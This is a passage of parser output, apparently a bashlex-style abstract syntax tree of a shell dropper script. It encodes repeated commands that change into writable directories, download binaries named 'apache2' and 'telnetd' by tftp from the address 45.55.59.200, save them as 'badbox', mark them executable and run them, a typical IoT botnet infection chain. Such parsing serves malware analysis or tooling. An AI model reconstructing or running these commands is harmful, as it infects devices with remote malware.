  OperatorNode(lineno=15, op=';', pos=(1515, 1516)),
  CommandNode(lineno=15, pos=(1516, 1524), parts=[
    WordNode(lineno=15, pos=(1516, 1524), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1525, 1644), parts=[
  CommandNode(lineno=16, pos=(1525, 1532), parts=[
    WordNode(lineno=16, pos=(1525, 1527), word='cd'),
    WordNode(lineno=16, pos=(1528, 1532), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1533, 1535)),
  CommandNode(lineno=16, pos=(1536, 1547), parts=[
    WordNode(lineno=16, pos=(1536, 1538), word='cd'),
    WordNode(lineno=16, pos=(1539, 1547), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1548, 1550)),
  CommandNode(lineno=16, pos=(1551, 1558), parts=[
    WordNode(lineno=16, pos=(1551, 1553), word='cd'),
    WordNode(lineno=16, pos=(1554, 1558), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1559, 1561)),
  CommandNode(lineno=16, pos=(1562, 1570), parts=[
    WordNode(lineno=16, pos=(1562, 1564), word='cd'),
    WordNode(lineno=16, pos=(1565, 1570), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1571, 1573)),
  CommandNode(lineno=16, pos=(1574, 1578), parts=[
    WordNode(lineno=16, pos=(1574, 1576), word='cd'),
    WordNode(lineno=16, pos=(1577, 1578), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1578, 1579)),
  CommandNode(lineno=16, pos=(1580, 1608), parts=[
    WordNode(lineno=16, pos=(1580, 1584), word='tftp'),
    WordNode(lineno=16, pos=(1585, 1597), word='45.55.59.200'),
    WordNode(lineno=16, pos=(1598, 1600), word='-c'),
    WordNode(lineno=16, pos=(1601, 1604), word='get'),
    WordNode(lineno=16, pos=(1605, 1608), word=' '),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1608, 1609)),
  CommandNode(lineno=16, pos=(1609, 1624), parts=[
    WordNode(lineno=16, pos=(1609, 1612), word='cat'),
    WordNode(lineno=16, pos=(1613, 1616), word=' '),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1618, 1624), word='badbox'), pos=(1617, 1624), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1624, 1625)),
  CommandNode(lineno=16, pos=(1625, 1635), parts=[
    WordNode(lineno=16, pos=(1625, 1630), word='chmod'),
    WordNode(lineno=16, pos=(1631, 1633), word='+x'),
    WordNode(lineno=16, pos=(1634, 1635), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1635, 1636)),
  CommandNode(lineno=16, pos=(1636, 1644), parts=[
    WordNode(lineno=16, pos=(1636, 1644), word='./badbox'),
  ]),
])
ListNode(lineno=17, pos=(1645, 1772), parts=[
  CommandNode(lineno=17, pos=(1645, 1652), parts=[
    WordNode(lineno=17, pos=(1645, 1647), word='cd'),
    WordNode(lineno=17, pos=(1648, 1652), word='/tmp'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1653, 1655)),
  CommandNode(lineno=17, pos=(1656, 1667), parts=[
    WordNode(lineno=17, pos=(1656, 1658), word='cd'),
    WordNode(lineno=17, pos=(1659, 1667), word='/var/run'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1668, 1670)),
  CommandNode(lineno=17, pos=(1671, 1678), parts=[
    WordNode(lineno=17, pos=(1671, 1673), word='cd'),
    WordNode(lineno=17, pos=(1674, 1678), word='/mnt'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1679, 1681)),
  CommandNode(lineno=17, pos=(1682, 1690), parts=[
    WordNode(lineno=17, pos=(1682, 1684), word='cd'),
    WordNode(lineno=17, pos=(1685, 1690), word='/root'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1691, 1693)),
  CommandNode(lineno=17, pos=(1694, 1698), parts=[
    WordNode(lineno=17, pos=(1694, 1696), word='cd'),
    WordNode(lineno=17, pos=(1697, 1698), word='/'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1698, 1699)),
  CommandNode(lineno=17, pos=(1700, 1732), parts=[
    WordNode(lineno=17, pos=(1700, 1704), word='tftp'),
    WordNode(lineno=17, pos=(1705, 1717), word='45.55.59.200'),
    WordNode(lineno=17, pos=(1718, 1720), word='-c'),
    WordNode(lineno=17, pos=(1721, 1724), word='get'),
    WordNode(lineno=17, pos=(1725, 1732), word='apache2'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1732, 1733)),
  CommandNode(lineno=17, pos=(1733, 1752), parts=[
    WordNode(lineno=17, pos=(1733, 1736), word='cat'),
    WordNode(lineno=17, pos=(1737, 1744), word='apache2'),
    RedirectNode(lineno=17, output=
      WordNode(lineno=17, pos=(1746, 1752), word='badbox'), pos=(1745, 1752), type='>'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1752, 1753)),
  CommandNode(lineno=17, pos=(1753, 1763), parts=[
    WordNode(lineno=17, pos=(1753, 1758), word='chmod'),
    WordNode(lineno=17, pos=(1759, 1761), word='+x'),
    WordNode(lineno=17, pos=(1762, 1763), word='*'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1763, 1764)),
  CommandNode(lineno=17, pos=(1764, 1772), parts=[
    WordNode(lineno=17, pos=(1764, 1772), word='./badbox'),
  ]),
])
ListNode(lineno=18, pos=(1773, 1900), parts=[
  CommandNode(lineno=18, pos=(1773, 1780), parts=[
    WordNode(lineno=18, pos=(1773, 1775), word='cd'),
    WordNode(lineno=18, pos=(1776, 1780), word='/tmp'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(1781, 1783)),
  CommandNode(lineno=18, pos=(1784, 1795), parts=[
    WordNode(lineno=18, pos=(1784, 1786), word='cd'),
    WordNode(lineno=18, pos=(1787, 1795), word='/var/run'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(1796, 1798)),
  CommandNode(lineno=18, pos=(1799, 1806), parts=[
    WordNode(lineno=18, pos=(1799, 1801), word='cd'),
    WordNode(lineno=18, pos=(1802, 1806), word='/mnt'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(1807, 1809)),
  CommandNode(lineno=18, pos=(1810, 1818), parts=[
    WordNode(lineno=18, pos=(1810, 1812), word='cd'),
    WordNode(lineno=18, pos=(1813, 1818), word='/root'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(1819, 1821)),
  CommandNode(lineno=18, pos=(1822, 1826), parts=[
    WordNode(lineno=18, pos=(1822, 1824), word='cd'),
    WordNode(lineno=18, pos=(1825, 1826), word='/'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1826, 1827)),
  CommandNode(lineno=18, pos=(1828, 1860), parts=[
    WordNode(lineno=18, pos=(1828, 1832), word='tftp'),
    WordNode(lineno=18, pos=(1833, 1845), word='45.55.59.200'),
    WordNode(lineno=18, pos=(1846, 1848), word='-c'),
    WordNode(lineno=18, pos=(1849, 1852), word='get'),
    WordNode(lineno=18, pos=(1853, 1860), word='telnetd'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1860, 1861)),
  CommandNode(lineno=18, pos=(1861, 1880), parts=[
    WordNode(lineno=18, pos=(1861, 1864), word='cat'),
    WordNode(lineno=18, pos=(1865, 1872), word='telnetd'),
    RedirectNode(lineno=18, output=
      WordNode(lineno=18, pos=(1874, 1880), word='badbox'), pos=(1873, 1880), type='>'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1880, 1881)),
  CommandNode(lineno=18, pos=(1881, 1891), parts=[
    WordNode(lineno=18, pos=(1881, 1886), word='chmod'),
    WordNode(lineno=18, pos=(1887, 1889), word='+x'),
    WordNode(lineno=18, pos=(1890, 1891), word='*'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1891, 1892)),
  CommandNode(lineno=18, pos=(1892, 1900), parts=[
    WordNode(lineno=18, pos=(1892, 1900), word='./badbox'),
  ]),
])
